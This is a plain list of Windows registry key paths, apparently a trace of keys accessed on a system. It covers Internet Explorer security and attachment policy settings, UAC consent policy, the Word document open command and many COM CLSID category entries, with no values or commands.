HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\PhishingFilter\EnabledV8
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments\ScanWithAntiVirus
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments\SaveZoneInformation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments\UseTrustedHandlers
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1807
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1807
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VirusScanner
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\VirusScanner
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoFileLifetimeExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoFileLifetimeExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\NoFileLifetimeExtension\.doc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell\Open
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell\Open\NeverDefault
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell\Open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell\Open\command\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\CLSID\Implemented Categories\
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000002F-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000100-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000101-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000103-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000104-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000105-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000106-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000107-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000109-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000300-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000301-A8F2-4877-BA0A-FD2B6645FB94}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000303-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000304-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000305-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000306-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000308-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000309-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000030B-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000315-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000316-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000319-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000031A-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000031D-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000320-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000327-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000032E-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000507-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000050B-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000514-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000051A-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000535-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000541-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000542-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000560-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000602-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000609-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000615-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000618-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000061B-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000061E-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000621-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020000-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020001-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020003-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002000D-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002000F-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002034C-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002034E-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020421-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020422-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020423-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020425-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020800-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020801-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020803-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020810-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020811-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020812-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020818-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020819-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020827-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020900-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020901-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020907-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{000209F0-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{000209F1-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{000209F2-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{000209F4-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{000209F5-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{000209FE-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{000209FF-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020C01-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020D09-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020D75-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00021400-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00021700-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00022601-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00022602-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00022603-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00024500-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00024502-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00024505-0014-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00024522-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002CE02-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E005-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E006-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E101-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E119-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E132-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E169-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E170-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E174-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E178-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E17C-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E185-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E187-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E18B-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030000-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030001-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030002-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030003-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030004-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030005-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030006-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003000A-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003000B-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003000C-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003000D-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003000E-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00031009-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003100A-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00031018-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00041943-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00044851-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{000498C4-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00061068-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00062000-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00062001-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00062002-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00062003-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00062004-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067009-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0006729A-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067800-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067801-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067802-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067803-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067804-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067808-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0006780A-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
